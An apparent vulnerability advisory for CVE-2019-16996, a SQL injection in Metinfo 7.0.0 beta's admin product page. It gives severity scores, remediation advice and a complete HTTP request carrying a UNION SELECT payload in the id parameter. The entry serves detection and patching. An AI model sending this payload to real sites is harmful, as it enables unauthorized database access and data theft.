| Title | Metinfo 7.0.0 beta - SQL Injection |
|---|---|
| Author | ritikchaddha |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. |
| CVSS Score | 7.2 |
| EPSS Score | 0.92241 |
| CVE ID | CVE-2019-16996 |
| CWE ID | CWE-89 |
| Tags | cve2019 cve metinfo sqli vkev vuln |
Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter.
GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-16996.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-16996.pcap
N/AN/A